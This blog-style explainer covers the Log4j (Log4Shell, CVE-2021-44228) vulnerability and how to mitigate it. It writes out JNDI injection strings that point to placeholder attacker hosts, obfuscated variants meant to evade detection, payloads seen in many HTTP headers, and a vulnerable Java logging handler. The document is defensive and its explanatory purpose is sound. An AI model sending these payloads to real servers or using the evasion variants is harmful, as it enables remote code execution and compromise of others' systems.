What Is Log4j?
Log4j is a Java library to log error messages in applications. Web apps, cloud services, and email platforms are using this. In addition, a large percentage of the Java programs for both server and client applications use it.
What Is Log4j vulnerability?
The vulnerability in Log4j allows hackers to run "arbitrary code" and gain access to a computer system. Moreover, threat actors can use the Log4j vulnerability to gain control of hacked web-facing servers by feeding them a malicious text string.
The vulnerability, CVE-2021-44228 allows remote attackers to acquire control of susceptible devices. An attacker just sends a simple malicious request including formatted text. After that, the log4j library is picking it up.
The vulnerability is caused by a lack of sanitization in the log4j library's lookup function. An attacker can use JNDI (Java Naming and Directory Interface) to make the following request to a remote malicious resource: ${jndi:ldap:/[attacker domain]/file}
An attacker can build many attack string combinations by using different protocols such as LDAP and RMI, as well as commands such as upper/lower. Furthermore, we noticed several obfuscation strategies to evade detection:
${${::-j}ndi:rmi://[attacker_domain/file]}
${${lower:jndi}:${lower:rmi}://[attacker_domain/file]}
${${upper:${upper:jndi}}:${upper:rmi}://[attacker_domain]/file}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://[attacker_domain]/file}The Log4J vulnerability's ubiquity is maybe the most concerning element. Eventually, an attacker can use this flaw to execute code remotely. This enables them to:
- Use the impacted device or application to get access to the whole network.
- Execute any code
- All data on the infected device or application can be accessed.
- Remove or encrypt files
The Chain of Infection
The malicious payload downloads a PowerShell script, which begins the malware installation process.
The IP address 2[.]56.59.123, which hosts the malicious files, is based in the United States and hosts a number of malicious files, including a Linux elf currency miner file and Cobalt Strike.
Exploit Trends and Anecdotes
We discovered exploit attempts using the standard attack payload:
${jndi:ldap://<MALICIOUS DOMAIN>/Exploit} We discovered some intriguing variances and trends:
Scanners have used it
Interestingly, we discovered cases in which a single IP attempted to deliver the malicious payload via a wide range of HTTP headers in a series of attempts:
Access-Control-Request-Method: ${jndi:ldap://<REDACTED_IP>:42468/a}
Access-Control-Request-Headers: ${jndi:ldap://<REDACTED_IP>:42468/a}
Warning: ${jndi:ldap://<REDACTED_IP>:42468/a}
Authorization: ${jndi:ldap://<REDACTED_IP>:42468/a}
TE: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Charset: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Datetime: ${jndi:ldap://<REDACTED_IP>:42468/a}
Date: ${jndi:ldap://<REDACTED_IP>:42468/a}
Expect: ${jndi:ldap://<REDACTED_IP>:42468/a}
Forwarded: ${jndi:ldap://<REDACTED_IP>:42468/a}
From: ${jndi:ldap://<REDACTED_IP>:34467/a}
X-Api-Version: ${jndi:ldap://<REDACTED_IP>:42468/a}
Max-Forwards: ${jndi:ldap://<REDACTED_IP>:34467/a}Such behaviour might be linked to the Qualys vulnerability scanner, which claims to have added a variety of tests that seek to deliver Log4j vulnerability payloads over several HTTP headers. While it's encouraging to see the rapid uptake of pen-testing and scanning tools for this new vulnerability, one can't help but worry what would happen if malevolent actors employed these tools.
Sinkholes Created
By inspecting attack data, we were able to identify sinkhole addresses that were used to test susceptible devices. Moreover, Sinkholes are internet-facing servers that gather traffic. Eventually, PoC successfully exploits vulnerabilities by delivering them.
A large number of HTTP requests with headers like the ones below indicate the use of a sinkhole:
User-Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent
User-Agent: ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent} The sinkhole address corresponds to the protocol and header on which the exploit attempt succeeds.
This is a real-world header:
X-Api-Version: ${jndi:ldap://<REDACTED>.burpcollaborator.net/a This is an example of how the burp collaborator platform can use in sinkhole successful PoCs. Moreover, the header utilization is unusual. Security programs attempt to avoid detection.
Which Systems and Devices Are at Risk?
Every major Java-based corporate program and server uses Log4j. Because of its extensive use in software programs and internet services, many services are vulnerable to this attack. It can endanger any device that runs Apache Log4j versions 2.0 to 2.14.1 and connects to the internet.
How to Protect Yourself From the Log4j Vulnerability
There are several ways to prevent this vulnerability. In addition, below there are some tips on how to protect from this vulnerability.
Locate the Log4j Vulnerability
When the entire application integration study is finished, any mistakes or vulnerabilities will be highlighted.
The following sequence demonstrates how to log forging is feasible and how an attacker can change log records:
public class SampleTest implements HttpHandler {
static Logger log = LogManager.getLogger(SampleTest.class.getName());
public void handle(HttpExchange http) {
String api = http.getRequestHeaders().getFirst("X-Api-Version");
log.info("Version:{}", api);
}
}Updates and Patching
You should act quickly to locate internet-facing Log4j devices and upgrade them to the latest version.
Additionally, you should install any updates and security patches offered by manufacturers and suppliers as they become available. As an example, Minecraft has already recommended users upgrade the game to avoid difficulties. On the other hand, other open-source programs, such as Paper, are also publishing patches to address the issue.
Create Log4j-specific rules in the Web Application Firewall
At the time, installing a Web Application Firewall was the greatest method of defence against Log4j (WAF). Moreover, if your business already has a WAF in place, it is recommended to apply Log4j-specific rules.
As a result, you can protect your apps from Log4j by identifying and blocking harmful character strings on upstream devices, such as a WAF.
Externals
If you learn about Application Security, please feel free to go there.